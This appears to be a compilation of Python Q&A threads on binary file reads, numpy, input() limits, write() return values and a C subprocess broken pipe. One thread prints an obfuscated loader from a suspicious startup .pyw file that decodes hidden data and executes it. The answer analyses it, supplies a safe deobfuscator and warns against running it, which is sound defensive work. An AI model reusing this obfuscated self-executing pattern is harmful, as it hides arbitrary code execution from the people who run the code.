File read reaches end of file unexpectedly - python

I'm translating a MATLAB script that reads a file of binary-encoded 32-bit integers and parses them. I have written the following function, which is intended to mimic MATLAB's fread() function:
def readi(f,n):
    x = zeros(n,int);
    for i in range(0,n):
        x[i] = struct.unpack('i',f.read(4))[0];
        print x[i];
    return x;
I call this function variously with n between 1 and 9 in my script as I parse out the data. My problem is that the script only gets part of the way into the file before I get this error:
x[i] = struct.unpack('i',f.read(4))[0];
struct.error: unpack requires a string argument of length 4
It appears that Python thinks I have reached the end of the file. The error occurs on a line inside a loop that has already run several times. In addition, the small portion of the file that was parsed matches exactly what my MATLAB script produces from the very same file (not a copy). MATLAB, however, is able to read a much larger dataset from the file. Does anyone have ideas on why this error is occurring?

In my own testing, whether the file was opened in binary mode or not (surprisingly) didn't matter. The only thing I can suggest is to make sure you understand the format of the input file exactly. So in addition to reading the MATLAB script, it might be a good idea to look at a hex dump of the file, where you can see the individual bytes of raw data and verify whether they match your understanding of the layout of its contents.
Besides all that, you could try the following simplification/optimization of your readi() function, which does not require the temporary x list and reads the bytes of all the integers in the group with one call to file.read():
def readi(f, n):
    fmt = '%di' % n
    return struct.unpack(fmt, f.read(struct.calcsize(fmt)))
However, I don't think it will solve your problem, because it should be equivalent to what you are already doing, return-value-wise anyway (it doesn't print anything like yours does).
One final note -- you don't need to end your lines of code with a semicolon. Python isn't like C and several other languages in that respect.
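When a read comes up short, it can help to know exactly where in the file it happened. Here is a minimal sketch, assuming the file is opened in binary mode ('rb'). The helper name read_ints is made up for illustration and is not part of the original script. It reports the offset and byte count of a short read instead of letting struct.unpack fail:

```python
import struct

def read_ints(f, n):
    """Read n native 32-bit integers from the binary file object f."""
    fmt = '%di' % n
    size = struct.calcsize(fmt)
    offset = f.tell()              # where this group starts in the file
    data = f.read(size)
    if len(data) != size:
        # Short read: say where it happened and how many bytes came back.
        raise EOFError('wanted %d bytes at offset %d, got %d'
                       % (size, offset, len(data)))
    return struct.unpack(fmt, data)
```

Comparing the reported offset with the file's size and with a hex dump should show whether the data really ends there.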

Related

Python np.fromfile() adding arbitrary random comma when reading from binary file

I've run into a weird problem that I haven't been able to solve for days. I created a byte array containing the values 1 to 250 and wrote it to a binary file from C# using WriteAllBytes.
Later I read it from Python using np.fromfile(filename, dtype=np.ubyte). However, I noticed that this function was adding an arbitrary comma (see the image). Interestingly, it is not visible in the array properties, and if I call numpy.array2string, the comma turns into '\n'. One solution is to replace the comma with nothing, but I have very long sequences, and running a replace over 100 GB of data would take forever. I also rechecked the files by reading them with .NET Core, and I'm quite sure the comma is not there.
What could I be missing?
Edit:
I was trying to read all the byte values into an array and convert either each element or the entire array to a string. I found that the most reliable way to do this is:
list(map(str, ubyte_array))
The code above returns a list of strings whose elements contain no arbitrary commas or blank spaces.

Trying to understand this potentially virus encrypted pyw file

Today I realised this .pyw file had been added to my startup files.
Though I have already deleted it, I'm worried about what it may have done to my computer. It's sort of encrypted and I am not very familiar with Python, but I assume that since this is the source code, there is no way to completely encrypt it.
Can someone either guide me through decoding it, or check it for me?
edit: by the looks of it I can only post some of it here, but it should give a brief idea of how it was encrypted:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/
OBLIGATORY WARNING: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii
# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
    decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
    r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
    for x in r:
        if x == "ζ":
            print()
        else:
            x = chr(ord(x)-683867)
            if x in decode:
                x = decode[(decode.index(x) + 1) % len(decode)]
            print(x, end='')
Each sequence of hex digits between the / characters encodes one character: every two hex digits are treated as a byte, and the bytes are interpreted as UTF-8. A ζ marks a line break. For any other character, its numerical code point is taken, the magic number 683867 is subtracted from it, and the new number is converted back into a character. Finally, if the character is a letter or number, it's "shifted" once to the right in the decode string, so letters move one forward in the alphabet and numbers increase by one (if it's not a letter/number, then no shift is done). The result, presumably, forms a valid Python program.
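These decoding steps can be checked against the start of the _sparkle string that was posted. The following is only a sketch. The name decode_payload is made up for illustration, and unlike the function above it returns the decoded text instead of printing it. It never executes the result.

```python
import binascii

ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789'
NEWLINE_MARK = '\u03b6'   # the Greek letter zeta, used as the line-break marker
OFFSET = 683867           # the magic number subtracted from each code point

def decode_payload(data):
    # Hex -> bytes -> UTF-8 text, one piece per '/'-separated chunk.
    text = ''.join(binascii.unhexlify(chunk).decode('utf-8')
                   for chunk in data.split('/') if chunk)
    out = []
    for ch in text:
        if ch == NEWLINE_MARK:
            out.append('\n')
            continue
        ch = chr(ord(ch) - OFFSET)
        if ch in ALPHABET:
            # Shift one place to the right, wrapping from '9' back to 'a'.
            ch = ALPHABET[(ALPHABET.index(ch) + 1) % len(ALPHABET)]
        out.append(ch)
    return ''.join(out)

prefix = 'ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83'
print(repr(decode_payload(prefix)))   # prints '\n# hi'
```

For example, f2a6bf82 is the UTF-8 encoding of code point 683970. Subtracting 683867 gives 103 ('g'), which the shift turns into 'h'.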
From here, you have a few options.
Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
Post the full _sparkle string in the question, so I or someone else can decode it.
Wipe the PC to factory settings and move on.

Can we remove the input function's line length limit purely within Python? [duplicate]

I'm trying to input() a string containing a large paste of JSON.
(Why I'm pasting a large blob of json is outside the scope of my question, but please believe me when I say I have a not-completely-idiotic reason!)
However, input() only grabs the first 4095 characters of the paste, for reasons described in this answer.
My code looks roughly like this:
import json
foo = input()
json.loads(foo)
When I paste a blob of JSON that's longer than 4095 characters, json.loads(foo) raises an error. (The error varies based on the specifics of how the JSON gets cut off, but it invariably fails one way or another because it's missing the final }.)
I looked at the documentation for input(), and it made no mention of anything that looked useful for this issue. No flags to input in non-canonical mode, no alternate input()-style functions to handle larger inputs, etc.
Is there a way to be able to paste large inputs successfully? This would make my tool's workflow way less janky than having to paste into a file, save it somewhere, and then pass the file's location into the script.
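Python has to follow the terminal's rules. But you could use a system call from Python to change the terminal's behaviour and then change it back (Linux):
import subprocess, json
# Turn off canonical mode so the terminal's line-length limit no longer applies.
subprocess.check_call(["stty", "-icanon"])
try:
    result = json.loads(input())
finally:
    # Always restore canonical mode, even if parsing fails.
    subprocess.check_call(["stty", "icanon"])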
Alternatively, consider getting an indented JSON dump from your provider, so that each individual line stays short. You can then read it line by line and decode the result:
import sys, json
data = "".join(sys.stdin.readlines())
result = json.loads(data)
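The line-by-line approach can be tried without a terminal. This is a minimal sketch, assuming a hypothetical helper named load_json_from_stream that accepts any file-like object (sys.stdin in the real tool, an io.StringIO here):

```python
import io
import json
import sys

def load_json_from_stream(stream=None):
    """Read every line until EOF from stream and parse the result as JSON."""
    if stream is None:
        stream = sys.stdin
    return json.loads("".join(stream.readlines()))

# An indented dump: several short lines instead of one very long one.
sample = io.StringIO('{\n  "name": "example",\n  "values": [1, 2, 3]\n}\n')
print(load_json_from_stream(sample))
```

At a terminal, the paste has to be followed by the end-of-file key (Ctrl-D on Linux) so that readlines() returns.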

Why python automatically returns character counts when write file

I recently noticed that when I have the following code:
File = "/dir/to/file"
Content = "abcdefg"
with open(File,"a") as f:
    f.write(Content)
I got "7" as an output and it is the count of characters in the variable "Content". I do not recall seeing this (I used ipython notebook before, but this time I did it in the python environment in shell) and wonder if I did something wrong. My python version: Python 3.3.3. Thank you for your help.
This behaviour is normal for most .write() implementations; see also I/O Base Classes.
For example io.RawIOBase.write
Write the given bytes-like object, b, to the underlying raw stream, and return the number of bytes written.
or io.TextIOBase.write
Write the string s to the stream and return the number of characters written.
Which IO-class is used depends on (the OS and) the parameters given to open. But as far as I can see all of them return some sort of "characters" or "bytes" written count.
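The return value is easy to see outside an interactive session. Here is a small sketch that uses an in-memory io.StringIO in place of a real file (an assumption made so the example leaves nothing on disk):

```python
import io

buf = io.StringIO()
count = buf.write("abcdefg")   # write() returns the number of characters written
print(count)                   # prints 7

# Assigning the result to a name keeps an interactive shell from echoing it.
_ = buf.write("xyz")
```

The interactive interpreter echoes the value of any expression statement that is not None, which is why the 7 shows up in the shell but not when the same code runs as a script.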

C subprocess from Python: sub.stdin.write IOError Broken Pipe

I am getting a Broken Pipe error when writing a large quantity of data very fast to a C subprocess.
I am running a C subprocess from a Python script:
process = subprocess.Popen("./gpiopwm", stdin=subprocess.PIPE)
while True:
    process.stdin.write("m2000\n")
    print "bytes written"
Section of the main loop of gpiopwm.c:
printf("1\n");
while (1) {
    fgets(input,7,stdin); // Takes input from python script
    printf("2\n");
    numbers = input+1; // stores all but first char of input
    char first = input[0]; // stores first char of input
    if (first=='m') {
        printf("3\n");
        printf("%s\n",numbers);
    }
}
However, the output from this is as follows:
1
bytes written
Traceback (most recent call last):
  File "serial-receive-to-pwm.py", line 20, in <module>
    process.stdin.write("m2000\n")
IOError: [Errno 32] Broken pipe
The C program evidently breaks at the fgets line, as 2 is never printed.
What have I done wrong? How can I avoid this?
EDIT:
I've updated the fgets line so that it does not include the dereference argument, but am still getting the broken pipe error.
EDIT:
input is initialized as char *input="m2000";
If you try running your C program from the console, you will see that it crashes. And if you run in a debugger, you will see that it's on this line:
fgets(*input,7,stdin);
It seems like input is a character array, and when you dereference it with *input you are passing not a pointer but a single char value. This leads to undefined behavior and the crash.
That line should have given you if not an error then a very big warning message from the compiler. Don't ignore warning messages, they are often an indicator of you doing something wrong and possibly dangerous.
A general tip: When developing a program that should be called from another program, like you do here, test the program first to make sure it works. If it doesn't work, then fix it first.
A final tip: Remember that fgets includes the newline in the destination string. You might want to check for it and remove it if it's there.
With the last edit, showing the declaration of input we know the real problem: You're trying to modify constant data, and also you want to write beyond the bounds of the data as well.
When you make input point to a literal string, you have to remember that all literal strings are read only, you can not modify a literal string. Trying to do so is undefined behavior. To make it worse, your string is only six characters long, but you try to write seven characters to it.
First change the declaration and initialization of input:
char input[16] = "m2000\n";
This declares it as an array located on the stack, which can be modified. Then do
while (fgets(input, sizeof(input), stdin) != NULL) { ... }
This accomplishes two things: First by using sizeof(input) as the size, you can be sure that fgets will never write out of bounds. Secondly, by using the fgets call in the loop condition the loop will end when the Python script is interrupted, and you won't loop forever failing to read anything and then work on data that you've never read.
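The same end-of-input behaviour can be sketched from the Python side. Because gpiopwm itself isn't available here, a tiny Python child process stands in for it (an assumption for illustration only). Like the corrected C loop, it reads lines until its stdin is closed. The helper name send_commands is hypothetical.

```python
import subprocess
import sys

# Stand-in for ./gpiopwm: print the rest of every line that starts with 'm'.
CHILD = (
    "import sys\n"
    "for line in sys.stdin:\n"
    "    if line.startswith('m'):\n"
    "        print(line[1:].strip())\n"
)

def send_commands(commands):
    proc = subprocess.Popen(
        [sys.executable, "-c", CHILD],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        universal_newlines=True,
    )
    # communicate() writes the input, closes stdin (EOF for the child) and waits.
    out, _ = proc.communicate("".join(c + "\n" for c in commands))
    return proc.returncode, out.split()

print(send_commands(["m2000", "m1500"]))   # prints (0, ['2000', '1500'])
```

Once stdin is closed the child's loop ends and it exits cleanly. If the child dies early instead, a direct process.stdin.write() call fails with a broken pipe error, as in the question.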
